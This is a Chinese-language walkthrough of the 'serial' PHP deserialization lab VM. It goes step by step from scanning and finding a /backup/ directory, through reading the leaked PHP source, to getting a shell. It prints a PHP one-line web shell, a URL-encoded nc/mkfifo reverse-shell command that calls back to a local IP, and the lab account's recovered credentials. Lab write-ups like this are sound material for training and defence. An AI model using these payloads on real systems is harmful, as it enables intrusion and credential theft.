反序列化靶机-serial攻略

1、打开虚拟机

2、扫描活跃的IP和端口

3、访问并查看页面源码

4、使用burpsuite解码,发现其为对象序列化的输出结果

5、扫描目录,找到隐藏目录/backup/

6、访问

7、下载bak.zip,解压发现3个php文件

8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

9、get shell

制作一句话木马

<?php system($_GET['cmd']);?>

10、构造payload

11、访问192.168.3.179/4.php,将回显的base64编码后序列化的输出结果复制

12、添加反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f

13、反弹成功

14、cd /,然后ls

15、cat credentials.txt.bak

16、账号:sk4 密码:KywZmnPWW6tTbW5w

相关推荐
lang201509281 小时前
Spring空安全指南:告别空指针异常
java·安全·spring
安当加密3 小时前
如何通过掌纹识别实现Windows工作站安全登录:从技术原理到企业级落地实践
windows·安全·1024程序员节
广州华锐视点3 小时前
电力电网安全实训难题多?VR安全教育软件给出新方案
安全
德迅云安全杨德俊3 小时前
SCDN:互联网时代网站安全的安全保障
网络·安全·ddos
喜欢你,还有大家5 小时前
SELinux 安全机制
服务器·网络·安全
b0uu5 小时前
2025高校网络安全管理运维赛决赛-取证赛道
安全·web安全
white-persist5 小时前
社会工程学全解析:从原理到实战
网络·安全·web安全·网络安全·信息可视化·系统安全·1024程序员节
newxtc7 小时前
【重庆政务服务网-注册_登录安全分析报告】
人工智能·selenium·测试工具·安全·政务
芯盾时代8 小时前
低空经济网络安全的政策体系构建
安全·web安全·网络安全·低空经济
墨燃.8 小时前
江西省第二届职业技能大赛网络安全赛题 应急响应
安全·web安全